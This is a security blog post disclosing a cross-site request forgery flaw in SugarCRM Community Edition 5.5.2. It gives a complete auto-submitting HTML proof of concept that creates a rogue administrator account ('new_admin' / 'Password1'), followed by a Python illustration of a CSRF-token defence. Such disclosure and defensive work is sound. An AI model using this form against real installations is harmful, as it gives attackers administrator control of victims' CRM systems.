This site will soon be superseded by http://www.johnleitch.net

Sunday, May 30, 2010

SugarCRM Community Edition 5.5.2 Cross-site Request Forgery

SugarCRM Community Edition 5.5.2 does not protect the Users module's Save action against cross-site request forgery: the request carries no token or other value tied to the victim's session. If a logged-in administrator visits a page containing the form below, the browser submits it with the administrator's session cookie and SugarCRM creates a new user named new_admin with the password Password1 and administrator rights (is_admin=1, UserType=Administrator). The record field is left empty so Save creates a new user rather than updating an existing one. The action URL points at a lab installation at 192.168.1.4.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />
</form>
</body>
</html>
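The request above reaches the Save handler with nothing that ties it to the victim's session, which is exactly what a synchronizer token provides. The following is an added illustration, not code from this post or from SugarCRM, and it is written in Python rather than SugarCRM's PHP so that it runs stand-alone: the PoC's hidden inputs are parsed into the POST body the victim's browser would send, and a hypothetical `save_user` handler rejects that body because the attacker's page cannot know the token embedded in the victim's own EditView. The `csrf_token` field name, the session dictionary keys and the abridged copy of the form are assumptions made for the example.

```python
"""Synchronizer-token check for a state-changing form POST (added illustration).

parse_hidden_inputs() turns the PoC form into the POST body a victim's browser
would send; save_user() is a hypothetical stand-in for the Users/Save handler
that refuses any request whose token does not match the victim's session.
"""
import hmac
import secrets
from html.parser import HTMLParser

# Constructed sample input: an abridged copy of the PoC's hidden fields.
# The attacker's page cannot read the victim's session, so it has no way
# to fill in a csrf_token field, and none appears here.
POC_HTML = """
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
</form>
"""


class _HiddenInputs(HTMLParser):
    """Collect name/value pairs of <input type="hidden"> elements."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden" and "name" in a:
            self.fields[a["name"]] = a.get("value") or ""


def parse_hidden_inputs(html):
    """Return the POST body (as a dict) that auto-submitting this form sends."""
    parser = _HiddenInputs()
    parser.feed(html)
    return parser.fields


def issue_token(session):
    """Mint a per-session token; the legitimate EditView would embed it."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def save_user(session, form):
    """Hypothetical hardened Users/Save: authz and token checks before any write."""
    if not session.get("is_admin"):
        return ("denied", "not an administrator")
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison; a missing token compares against "" and fails.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return ("denied", "missing or invalid CSRF token")
    if form.get("module") != "Users" or form.get("action") != "Save":
        return ("ignored", "not a Users/Save request")
    # record == "" means "create", matching the PoC's intent.
    user = {
        "user_name": form.get("sugar_user_name") or form.get("user_name"),
        "is_admin": form.get("is_admin") == "1",
        "new": form.get("record", "") == "",
    }
    return ("created", user)


def demo():
    """Replay the PoC body against a victim admin session, then a legitimate save."""
    victim = {"user_id": "1", "is_admin": True}
    issue_token(victim)  # the victim's own EditView page would have minted this
    forged = parse_hidden_inputs(POC_HTML)
    forged_result = save_user(victim, forged)
    legit = dict(forged, csrf_token=victim["csrf_token"])
    legit_result = save_user(victim, legit)
    return forged_result, legit_result


if __name__ == "__main__":
    for label, result in zip(("forged request", "legitimate request"), demo()):
        print(f"{label}: {result}")
```

The token must be unpredictable, bound to the session and compared in constant time; checking that the Origin or Referer header names the SugarCRM host is a useful second layer but not a replacement, since older browsers and proxies strip it. Nothing in the PoC changes: its POST body simply no longer satisfies the handler.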

10 comments:

  1. John Leitch has discovered a vulnerability in SugarCRM, which can be exploited by malicious people to conduct cross-site request forgery attacks.
